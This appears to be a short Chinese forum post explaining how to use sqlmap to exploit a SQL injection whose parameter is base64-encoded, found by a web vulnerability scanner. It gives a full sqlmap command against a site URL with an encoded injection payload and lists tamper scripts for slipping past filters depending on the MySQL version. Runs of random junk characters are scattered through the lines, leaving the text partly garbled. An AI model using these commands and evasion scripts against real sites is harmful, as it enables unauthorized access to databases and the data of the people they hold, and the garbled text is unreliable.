WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?4 e* s+ ^1 o) W3 i$ |2 P3 h
' s3 {. G' L* I$ }5 s9 j3 osqlmap的tamper里有个base64encode.py
( ~/ J7 ?( i! j- X+ |$ S0 f/ o" H; p! S) {1 X4 }, F
使用如下* W* T, }, l# l' j5 [- [
3 G* {+ G" J8 p4 i, f
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs- B, |# D% }) l; \" P: Q: |
* u# p8 v% h: K4 B
# y& E- e |& F1 p! n# A
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”4 W9 y3 Y/ |# F
1 Y( _( ?3 l! m0 _8 j5 k其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
7 S( j9 q- J/ k2 f0 g5 |
' E0 X* k$ Q: }* ~space2hash.py ,对于MYSQL数据库 4.0, 5.0注入% N8 V0 B# p$ X7 W- C7 V
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
. ]3 O# v7 o: `+ l2 _1 W* g首先确定目标数据库版本,然后选择相应的脚本。
7 P m" U6 P q( N/ D-v 3 --batch --tamper "space2hash.py"7 S6 t* z) U+ Z0 S- c$ m
* d9 p. ~& ~& G: }
还有其他一些插件:( Y$ S& X& D# F" @$ \
encodes编码 ——charencode.py# ?# j" A% O8 h& q/ }( W1 T n
base64编码 —— base64encode.py
( B- [( @ }; v5 T/ o8 \ l替换空格和关键字 —— halfversionedmorekeywords.py
- k3 G% R, y* A6 f |
% t D. {* ]+ B h# z" O
) f. \& u9 z" ~- P+ G" ` F
' c% n& V% z& l1 O/ G3 V4 Z+ x) Y7 ]; B) n
|